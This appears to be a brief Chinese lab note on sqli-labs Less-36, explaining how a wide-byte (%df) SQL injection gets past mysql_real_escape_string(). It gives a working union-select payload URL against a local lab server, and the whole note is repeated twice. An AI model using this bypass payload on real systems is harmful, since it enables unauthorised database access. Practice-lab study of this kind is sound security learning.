【sqli-labs】 less36 GET- Bypass MYSQL_real_escape_string (GET型绕过MYSQL_real_escape_string的注入)
看一下mysql_real_escape_string()函数
\x00
\x1a
注入的关键还是在于闭合引号,同样使用宽字节注入
http://192.168.136.128/sqli-labs-master/Less-36/?id=0%df' union select 1,2,3%23
看一下mysql_real_escape_string()函数
\x00
\x1a
注入的关键还是在于闭合引号,同样使用宽字节注入
http://192.168.136.128/sqli-labs-master/Less-36/?id=0%df' union select 1,2,3%23